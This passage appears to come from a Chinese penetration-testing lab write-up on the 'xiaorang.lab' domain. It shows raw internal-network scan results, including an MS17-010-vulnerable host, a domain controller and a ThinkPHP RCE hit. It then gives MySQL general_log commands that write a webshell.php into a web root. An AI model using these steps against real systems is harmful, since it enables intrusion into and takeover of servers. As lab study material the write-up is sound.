start infoscan trying RunIcmp2 The current user permissions unable to send icmp packets start ping (icmp) Target 172.22.1.18 is alive (icmp) Target 172.22.1.2 is alive (icmp) Target 172.22.1.15 is alive (icmp) Target 172.22.1.21 is alive [*] Icmp alive hosts len is: 4 172.22.1.18:3306 open 172.22.1.21:445 open 172.22.1.2:445 open 172.22.1.18:445 open 172.22.1.18:80 open 172.22.1.21:139 open 172.22.1.2:139 open 172.22.1.18:139 open 172.22.1.21:135 open 172.22.1.2:135 open 172.22.1.18:135 open 172.22.1.15:22 open 172.22.1.15:80 open 172.22.1.2:88 open [*] alive ports len is: 14 start vulscan [*] OsInfo 172.22.1.2 (Windows Server 2016 Datacenter 14393) [+] MS17-010 172.22.1.21 (Windows Server 2008 R2 Enterprise 7601 Service Pack 1) [*] NetInfo [*]172.22.1.18 [->]XIAORANG-OA01 [->]172.22.1.18 [*] NetInfo [*]172.22.1.2 [->]DC01 [->]172.22.1.2 [*] NetInfo [*]172.22.1.21 [->]XIAORANG-WIN7 [->]172.22.1.21 [*] NetBios 172.22.1.21 XIAORANG-WIN7.xiaorang.lab Windows Server 2008 R2 Enterprise 7601 Service Pack 1 [*] NetBios 172.22.1.2 [+] DC:DC01.xiaorang.lab Windows Server 2016 Datacenter 14393 [*] WebTitle http://172.22.1.15 code:200 len:5578 title:Bootstrap Material Admin [*] WebTitle http://172.22.1.18 code:302 len:0 title:None 跳转url: http://172.22.1.18?m=login [*] NetBios 172.22.1.18 XIAORANG-OA01.xiaorang.lab Windows Server 2012 R2 Datacenter 9600 [*] WebTitle http://172.22.1.18?m=login code:200 len:4012 title:信呼协同办公系统 [+] PocScan http://172.22.1.15 poc-yaml-thinkphp5023-method-rce poc1 已完成 14/14 [*] 扫描结束,耗时: 10.969777995s
第一步执行show variables like 'general%';查看是否开启日志以及存放的日志位置
第二步set global general_log = ON;开启日志
第三步set global general_log_file设置日志保存位置
踩坑五
1 2 3 4
路径最好写成 set global general_log_file='C:\\phpStudy\\PHPTutorial\\www\\webshell.php'; 因为 \ 容易转义字符 set global general_log_file='C:\phpStudy\PHPTutorial\www\webshell.php';